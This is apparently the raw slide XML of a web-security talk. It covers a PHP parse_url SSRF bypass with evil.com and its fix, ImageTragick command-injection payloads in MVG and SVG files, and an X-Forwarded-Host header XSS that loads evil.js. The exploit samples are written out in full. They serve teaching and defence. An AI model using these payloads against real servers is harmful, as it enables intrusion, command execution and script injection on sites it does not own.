        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596416" y="71236"/>
            <a:ext cx="11811968" cy="78712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Abusing PHP URL Parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:p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E44CE2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  1 </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php</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41C4D1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2 $</a:t>
            </a:r>
            <a:r>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>parse_url</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="D6492E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'url'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</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D6492E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  3 if</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>'port'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>===</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>'host'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>===</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>"google.com"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B300B3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRP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effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  4 </a:t>
            </a:r>
            <a:r>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="D6492E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'url'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="22860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rPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="B300B3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:t>#@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parse_url()</a:t>
            </a:r>
            <a:r>
              <a:t> - google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>readfile()</a:t>
            </a:r>
            <a:r>
              <a:t> - evil.com</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he Fix:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82054" y="-17664"/>
            <a:ext cx="12840692" cy="8976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The Fix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Don’t check using one parser and fetch with another…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$p = parse_url($input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$clean = $p[‘scheme’] . $p[‘host’] . ‘:’ . $p[‘port’] .$p[‘query’] . $p[‘fragment’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>readfile($clean);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Conference talk on SSRF:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://www.youtube.com/watch?v=D1S-G8rJrEk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Universal Chrome XSS Bug on url parsing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://bugs.chromium.org/p/chromium/issues/detail?id=841105</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ImageTragick…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="107949"/>
            <a:ext cx="13055601" cy="866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ImageTragick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr b="1" i="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1. CVE-2016-3714 - 3718  Image magick contains file manipulation methods to read, write and delete files from the filesystem.  By default PRE: 6.9.3 these are set to open by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr b="1" i="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="6" algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> Exploit.mvg:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>push graphic-context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>viewbox 0 0 640 480</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>fill 'url(https://example.com/image.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";|ls "-la</a:t>
            </a:r>
            <a:r>
              <a:t>)'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>pop graphic-context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Exploit.svg:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;xml version="1.0" standalone="no"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;svg width="640px" height="480px" version=“1.1" xmlns=“http://www.w3.org/2000/svg"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;image xlink:href=“https://example.com/image.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;quot;|ls &amp;quot;-la</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>x="0" y="0" height="640px" width=“480px"/&gt; &lt;/svg&gt;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HTTP Header XSS FTW!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296608" y="222715"/>
            <a:ext cx="12411584" cy="8254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HTTP Header XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTW!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/en?test=1</a:t>
            </a:r>
            <a:r>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redhat.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>X-Forwarded-Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A”&gt;&lt;script src=evil.js&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF767A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3700"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;meta canonical-url=“https://</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A"&gt;&lt;script src=evil.js&gt;&lt;/script&gt;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erver Cache Poisoning:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725690" y="271489"/>
            <a:ext cx="11553420" cy="84486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Server Cache Poisoning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Making XSS great again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
